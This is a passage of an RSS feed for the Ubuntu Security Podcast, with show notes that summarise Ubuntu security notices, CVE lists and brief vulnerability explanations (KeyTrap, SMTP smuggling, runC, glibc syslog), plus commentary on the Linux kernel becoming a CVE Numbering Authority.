<li><a href="https://ubuntu.com/security/CVE-2023-46343">CVE-2023-46343</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-45863">CVE-2023-45863</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35827">CVE-2023-35827</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34324">CVE-2023-34324</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6626-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6626-1">USN-6626-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0641">CVE-2024-0641</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6622">CVE-2023-6622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6176">CVE-2023-6176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6039">CVE-2023-6039</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46813">CVE-2023-46813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35827">CVE-2023-35827</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34324">CVE-2023-34324</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32257">CVE-2023-32257</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32252">CVE-2023-32252</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32250">CVE-2023-32250</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6625-2-linux-kernel--gcp--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6625-2">USN-6625-2</a>] Linux kernel (GCP) vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-46343">CVE-2023-46343</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-45863">CVE-2023-45863</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35827">CVE-2023-35827</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34324">CVE-2023-34324</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6628-1-linux-kernel--intel-iotg--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6628-1">USN-6628-1</a>] Linux kernel (Intel IoTG) vulnerabilities</h3>
<ul>
<li>16 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0641">CVE-2024-0641</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0193">CVE-2024-0193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6932">CVE-2023-6932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6931">CVE-2023-6931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6817">CVE-2023-6817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6622">CVE-2023-6622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6606">CVE-2023-6606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6176">CVE-2023-6176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6040">CVE-2023-6040</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6039">CVE-2023-6039</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46813">CVE-2023-46813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35827">CVE-2023-35827</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34324">CVE-2023-34324</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32257">CVE-2023-32257</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32252">CVE-2023-32252</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32250">CVE-2023-32250</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6626-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6626-2">USN-6626-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0641">CVE-2024-0641</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6622">CVE-2023-6622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6176">CVE-2023-6176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6039">CVE-2023-6039</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46813">CVE-2023-46813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35827">CVE-2023-35827</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34324">CVE-2023-34324</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32257">CVE-2023-32257</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32252">CVE-2023-32252</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32250">CVE-2023-32250</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6608-2-linux-kernel--nvidia--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6608-2">USN-6608-2</a>] Linux kernel (NVIDIA) vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0193">CVE-2024-0193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6932">CVE-2023-6932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6931">CVE-2023-6931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6817">CVE-2023-6817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6606">CVE-2023-6606</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6635-1-linux-kernel--gcp--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6635-1">USN-6635-1</a>] Linux kernel (GCP) vulnerabilities</h3>
<ul>
<li>13 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0193">CVE-2024-0193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6932">CVE-2023-6932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6931">CVE-2023-6931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6817">CVE-2023-6817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6606">CVE-2023-6606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5717">CVE-2023-5717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5178">CVE-2023-5178</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5158">CVE-2023-5158</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42754">CVE-2023-42754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39193">CVE-2023-39193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39192">CVE-2023-39192</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39189">CVE-2023-39189</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-37453">CVE-2023-37453</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6627-1-libde265-vulnerabilities--04-10">[<a href="https://ubuntu.com/security/notices/USN-6627-1">USN-6627-1</a>] libde265 vulnerabilities (04:10)</h3>
<ul>
<li>18 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1253">CVE-2022-1253</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43253">CVE-2022-43253</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43252">CVE-2022-43252</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43248">CVE-2022-43248</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43243">CVE-2022-43243</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43240">CVE-2022-43240</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43239">CVE-2022-43239</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43237">CVE-2022-43237</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43236">CVE-2022-43236</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43235">CVE-2022-43235</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36410">CVE-2021-36410</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36409">CVE-2021-36409</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36408">CVE-2021-36408</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43242">CVE-2022-43242</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43241">CVE-2022-43241</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43238">CVE-2022-43238</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36411">CVE-2021-36411</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35452">CVE-2021-35452</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Open H.265 video codec implementation - used by gstreamer and hence Videos
(totem) in particular</li>
<li>Lots of the usual sorts of issues - a lot appear to have been found by a
couple different researchers fuzzing - assertion failure, NULL ptr derefs, OOB
reads, UAF, OOB writes etc - impact then ranging from DoS to possible code
execution</li>
</ul>
<h3 id="usn-6630-1-glance-store-vulnerability--05-26">[<a href="https://ubuntu.com/security/notices/USN-6630-1">USN-6630-1</a>] Glance_store vulnerability (05:26)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-1141">CVE-2024-1141</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OpenStack Image Service store library - library for interacting with assets
(images) via different storage technologies (local file-system, HTTP, RBD,
Swift, S3 and others)</li>
<li>S3 backend would log the <code>access_key</code> if logging configured at DEBUG level - any
user then able to read the logs could see the access key and hence potentially
get access to the S3 bucket (would also need the secret key too and this was
never logged so impact minimal)</li>
</ul>
<h3 id="usn-6631-1-webkitgtk-vulnerabilities--06-26">[<a href="https://ubuntu.com/security/notices/USN-6631-1">USN-6631-1</a>] WebKitGTK vulnerabilities (06:26)</h3>
<ul>
<li>3 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-23222">CVE-2024-23222</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23213">CVE-2024-23213</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23206">CVE-2024-23206</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Minimal info as with all webkit issues
<ul>
<li>&ldquo;improved memory handling to fix possible arbitrary code execution when processing crafted web content&rdquo;</li>
<li>&ldquo;improved access restrictions to fix user fingerprinting from a crafted web page&rdquo;</li>
<li>&ldquo;improved checks to fix a type confusion issue able to be triggered from
crafted web content - possibly exploited in the wild&rdquo;</li>
</ul>
</li>
</ul>
<h3 id="usn-6632-1-openssl-vulnerabilities--07-13">[<a href="https://ubuntu.com/security/notices/USN-6632-1">USN-6632-1</a>] OpenSSL vulnerabilities (07:13)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0727">CVE-2024-0727</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5678">CVE-2023-5678</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-218/#usn-6622-1-openssl-vulnerabilities--08-07">[USN-6622-1] OpenSSL vulnerabilities from Episode 218</a></li>
</ul>
<h3 id="usn-6633-1-bind-vulnerabilities--07-33">[<a href="https://ubuntu.com/security/notices/USN-6633-1">USN-6633-1</a>] Bind vulnerabilities (07:33)</h3>
<ul>
<li>5 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5679">CVE-2023-5679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5517">CVE-2023-5517</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-50868">CVE-2023-50868</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-50387">CVE-2023-50387</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4408">CVE-2023-4408</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Range of issues including 2 different CPU-based DoS - one in handling of
regular DNS queries / responses, the other in DNSSEC - &ldquo;KeyTrap&rdquo; - also
affects resolvers not just servers (so any client system as well that is doing
lookups) - affects the DNSSEC standard itself and hence affects various other
implementations as well</li>
<li>Attack works by having an attacker create a DNS zone with many RRSIG and
DNSKEY records - these contain a cryptographic signature and public key
respectively - so when trying to validate the DNSSEC record need both - and so
will end up trying every possible RRSIG with every possible DNSKEY to find a
match - with no bound on the computation time (and if implemented in a single
threaded manner) - can completely DoS the server / client etc.</li>
<li>Plus a similar issue in the NSEC3 proof of non-existence in DNSSEC</li>
</ul>
<h3 id="usn-6634-1-dot-net-vulnerabilities--09-47">[<a href="https://ubuntu.com/security/notices/USN-6634-1">USN-6634-1</a>] .NET vulnerabilities (09:47)</h3>
<ul>
<li>2 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-21404">CVE-2024-21404</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21386">CVE-2024-21386</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Updates for dotnet 6, 7 and 8</li>
<li>DoS when parsing X509 certificates if using OpenSSL (as is the case in Ubuntu)
and a DoS in the SignalR library (allows a server to send asynchronous
notifications to client-side web applications) able to be triggered by a
malicious client</li>
</ul>
<h3 id="usn-6629-1-usn-6629-2-ultrajson-vulnerabilities--10-34">[<a href="https://ubuntu.com/security/notices/USN-6629-1">USN-6629-1</a>, USN-6629-2] UltraJSON vulnerabilities (10:34)</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-31117">CVE-2022-31117</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-31116">CVE-2022-31116</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45958">CVE-2021-45958</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Fast JSON encoder/decoder for Python</li>
<li>Is actually implemented in C with Python bindings - so has usual issues - UAF,
memory corruption, stack buffer overflow</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="linux-kernel-becomes-a-cna--11-25">Linux kernel becomes a CNA (11:25)</h3>
<ul>
<li>
<p>Earlier this week, Greg Kroah-Hartman (one of the more famous Linux kernel
developers - responsible for the various stable kernel trees / releases plus
various subsystems within the kernel - also wrote one of the most popular
books on Linux Kernel Driver development - even if it is woefully outdated
nowadays) <a href="http://www.kroah.com/log/blog/2024/02/13/linux-is-a-cna/">announced</a> that the Linux kernel project itself has been accepted as
a CNA by MITRE and would start issues CVEs for the vulnerabilities found
within the kernel itself</p>
</li>
<li>
<p>Historically the upstream kernel developers and Greg himself have been quite
disparaging of the CVE process / ecosystem and essentially saying that CVEs
for the kernel are meaningless since that all bugs are potentially security
issues and there are so many fixes that go into the kernel of which the
security impact is not clear, that the only way to stay secure is to track one
of the supported upstream stable kernel trees - otherwise CVEs would be issued
for basically every commit that goes into one of the stable trees</p>
<ul>
<li>Whilst in Ubuntu we tend to agree that the only way to maintain a kernel is
to use the stable trees (and hence the Ubuntu Kernel team continuously
incorporates all the fixes from the upstream stable kernel trees into the
different Ubuntu kernels) we still see a lot of value in the CVE ecosystem -
and also we do not agree that all fix commits warrant a CVE</li>
</ul>
</li>
<li>
<p>It was not then surprising to see that in the initial announcement there was a
statement that:</p>
<blockquote>
<p>Note, due to the layer at which the Linux kernel is in a system, almost any
bug might be exploitable to compromise the security of the kernel, but the
possibility of exploitation is often not evident when the bug is
fixed. Because of this, the CVE assignment team is overly cautious and assign
CVE numbers to any bugfix that they identify.</p>
</blockquote>
</li>
<li>
<p>This led many (including us) to fear that the kernel CNA would be issuing an
extremely high volume of CVEs which would effectively overwhelm the CVE
process and make it unworkable - for instance, LWN calculated that for the 6.1
stable kernel has had over 12,000 fixes applied to it over the past year. So
this leaves a huge scope for many CVEs to be possibly assigned - and as a
comparison in total across all software / hardware devices etc in 2023 there
was 29,000 CVEs assigned. So that could mean the kernel itself would possibly
become responsible for at least a quarter of all CVEs in the future.</p>
</li>
<li>
<p>Greg has some prior form in this space as well since in 2019 he gave a talk
where he suggested one way the kernel community could help fix the issue of
CVEs being erroneously assigned against the kernel would be to start doing
exactly this and assigning a CVE for every fix applied to the kernel and hence
overwhelm the CVE ecosystem to (in his words) &ldquo;burn it down&rdquo;.</p>
</li>
<li>
<p>Also the <a href="https://github.com/cloudsecurityalliance/gsd-database">GSD project</a> (Global Security Database - set up as an alternate /
competitor to CVE) was doing exactly this - tracking a huge number of fixes
for the stable trees and assigning them GSD IDs - as per
<a href="https://osv.dev/list?ecosystem=Linux">https://osv.dev/list?ecosystem=Linux</a> it tracks 13573 issues</p>
</li>
<li>
<p>Thankfully though, this plan seems to have moderated over the past few days -
after Greg posted a patch set to the LKML documenting the process, he
clarified in a <a href="https://lwn.net/ml/linux-kernel/2024021459-trimness-bolt-7185@gregkh/">follow-up email</a> that this would not be the case, and instead
that CVEs will only be assigned for commits which appear to have a security
relevant impact. How they actually do that remains to be seen, and his comment
that &ldquo;we (will) know it when we see it&rdquo; doesn&rsquo;t exactly put me at ease (since
it is very easy to miss the security implications of any particular commit) at
least this helps allay the fears that there would be a tidal wave of CVEs
being assigned.</p>
</li>
<li>
<p>One outstanding issue which I <a href="https://fosstodon.org/@alexmurray/111933442780164300">directly asked Greg about</a> is how they are
actually tracking fixes for CVEs - since in their model, a CVE is equivalent
to the commit which fixes the issue - however for lots of existing kernel CVEs
that get assigned by other CNAs like Canonical or Red Hat etc, the fix
comprises multiple commits</p>
</li>
<li>
<p><a href="https://social.kernel.org/objects/f6204e3e-c283-46a1-bc7a-b92d49dca413">Greg says</a> the whole process is quite complex and whilst their existing scripts
want a one-to-one mapping from CVEs to commits they do plan to fix this in the
future.</p>
</li>
<li>
<p>So will be interesting to see what things they will end up assigning
CVEs. Also will be interesting to see how the interaction with security
researchers plays out. Since their process is heavily skewed to the CVE
corresponding to the fix commit AND they state that this must be in one of the
stable trees for a CVE to be assigned, it doesn&rsquo;t leave a lot of room for
responsible disclosure. They do say they can assign a CVE for an issue before
it is resolved with a commit to one of the stable trees, but ideally these
details would get disclosed to distros and others ahead of the CVE details
being released to the public. I also <a href="https://fosstodon.org/@alexmurray/111938661745672295">asked Greg about this</a> but am awaiting a
response.</p>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E219.mp3" length="20712864" type="audio/mpeg" /><itunes:duration>1252</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 218
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-218/</link>
          <pubDate>Fri, 09 Feb 2024 19:06:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>04552ce2bb2f0e019540213f15894565d41b0f4d66cb8c3811951687155401e25b35b9eb47470f63c1adbcac40e2a1b0e2f67bfd67019433f3a1121de83303e5</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 218</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          AppArmor unprivileged user namespace restrictions are back on the agenda this
  week as we survey the latest improvements to this hardening feature in the
  upcoming Ubuntu 24.04 LTS, plus we discuss SMTP smuggling in Postfix, runC...
        
        ]]></itunes:subtitle>
        <itunes:summary>  AppArmor unprivileged user namespace restrictions are back on the agenda this
  week as we survey the latest improvements to this hardening feature in the
  upcoming Ubuntu 24.04 LTS, plus we discuss SMTP smuggling in Postfix, runC
  container escapes and Qualys' recent disclosure of a privilege escalation
  exploit for GNU libc and more.
  </itunes:summary>
        <description>  AppArmor unprivileged user namespace restrictions are back on the agenda this
  week as we survey the latest improvements to this hardening feature in the
  upcoming Ubuntu 24.04 LTS, plus we discuss SMTP smuggling in Postfix, runC
  container escapes and Qualys' recent disclosure of a privilege escalation
  exploit for GNU libc and more.
  </description>
        <googleplay:description>  AppArmor unprivileged user namespace restrictions are back on the agenda this
  week as we survey the latest improvements to this hardening feature in the
  upcoming Ubuntu 24.04 LTS, plus we discuss SMTP smuggling in Postfix, runC
  container escapes and Qualys' recent disclosure of a privilege escalation
  exploit for GNU libc and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>AppArmor unprivileged user namespace restrictions are back on the agenda this
week as we survey the latest improvements to this hardening feature in the
upcoming Ubuntu 24.04 LTS, plus we discuss SMTP smuggling in Postfix, runC
container escapes and Qualys&rsquo; recent disclosure of a privilege escalation
exploit for GNU libc and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>39 unique CVEs addressed</p>
<h3 id="usn-6591-2-postfix-update--00-48">[<a href="https://ubuntu.com/security/notices/USN-6591-2">USN-6591-2</a>] Postfix update (00:48)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-51764">CVE-2023-51764</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>On 18th December (during the holiday break), SEC Consult published a report
about a new technique for email spoofing, which they dubbed SMTP Smuggling
<ul>
<li>Similar to HTTP Request Smuggling - relies on exploiting differences in how
SMTP protocol is interpreted by outbound (originating) vs inbound
(receiving) SMTP servers. In particular the end-of-data sequence
<code>&lt;CR&gt;&lt;LF&gt;.&lt;CR&gt;&lt;LF&gt;</code> gets interpreted loosely so that it is possible to include
extra SMTP commands within the message data which would then go on to be
interpreted as an additional SMTP commands to be executed by the receiving
server and to cause it to receive two emails when only one was sent in the
first place, and where the usual SPF checks get bypassed for this second
email - so can bypass SPF/DMARC policies to spoof emails from various
domains</li>
</ul>
</li>
<li>Affected a number of projects including postfix - Upstream postfix released
version 3.8.4 with an initial fix on 22nd December</li>
<li>We then released <a href="https://ubuntu.com/security/notices/USN-6591-1">USN-6591-1</a> with that fix</li>
<li>Then on 21st January released a more robust fix with an additional config
option to increase interoperability whilst still preventing SMTP smuggling</li>
<li>This second update includes the reworked fix</li>
</ul>
<h3 id="usn-6619-1-runc-vulnerability--03-22">[<a href="https://ubuntu.com/security/notices/USN-6619-1">USN-6619-1</a>] runC vulnerability (03:22)</h3>
<ul>
<li>1 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-21626">CVE-2024-21626</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>&ldquo;Internal file descriptor leak&rdquo; - using a specially crafted container image,
allows an attacker to cause a newly spawned container to have a working
directory within the host filesystem namespace which in turn can allow the
attacker to escape the container - various ways this can be attacked, full
details on the upstream advisory
<a href="https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv">https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv</a></li>
</ul>
<h3 id="usn-6620-1-gnu-c-library-vulnerabilities--04-17">[<a href="https://ubuntu.com/security/notices/USN-6620-1">USN-6620-1</a>] GNU C Library vulnerabilities (04:17)</h3>
<ul>
<li>3 CVEs addressed in Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6780">CVE-2023-6780</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6779">CVE-2023-6779</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6246">CVE-2023-6246</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest round of vulnerabilities from <a href="https://www.qualys.com/2024/01/30/cve-2023-6246/syslog.txt">Qualys</a></li>
<li>Affect the <a href="https://manpages.ubuntu.com/manpages/noble/man3/syslog.3.html"><code>syslog()</code></a> system call</li>
<li>Heap buffer overflow, off-by-one buffer overflow and integer overflow</li>
<li>Of these the heap buffer overflow is the most severe - Qualys were able to
demonstrate they could exploit and up-to-date default install of Fedora 38 to
escalate privileges from a local unprivileged user to root.
<ul>
<li>uses the value of <code>argv[0]</code> in a call to snprintf() into a fixed size buffer
allocated on the stack - snprintf() won&rsquo;t overflow this but will return a
value larger than the fixed size buffer - as a result a heap buffer to then
contain this string would only get allocated with a size of 1 byte but then
the full expected data would get copied into it - and since the attacker
controls this value they can write arbitrary data to the heap by just using
a crafted program name (which is easy to do via the the <a href="https://ss64.com/bash/exec.html"><code>exec</code> command</a> built
in to bash etc)</li>
</ul>
</li>
<li>Various setuid binaries like <code>/usr/bin/su</code> call <code>syslog()</code> internally and so can
be abused in this way</li>
</ul>
<h3 id="usn-6587-4-x-dot-org-x-server-regression--07-14">[<a href="https://ubuntu.com/security/notices/USN-6587-4">USN-6587-4</a>] X.Org X Server regression (07:14)</h3>
<ul>
<li>6 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-21886">CVE-2024-21886</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21885">CVE-2024-21885</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0409">CVE-2024-0409</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0408">CVE-2024-0408</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0229">CVE-2024-0229</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6816">CVE-2023-6816</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6621-1-imagemagick-vulnerability--07-28">[<a href="https://ubuntu.com/security/notices/USN-6621-1">USN-6621-1</a>] ImageMagick vulnerability (07:28)</h3>
<ul>
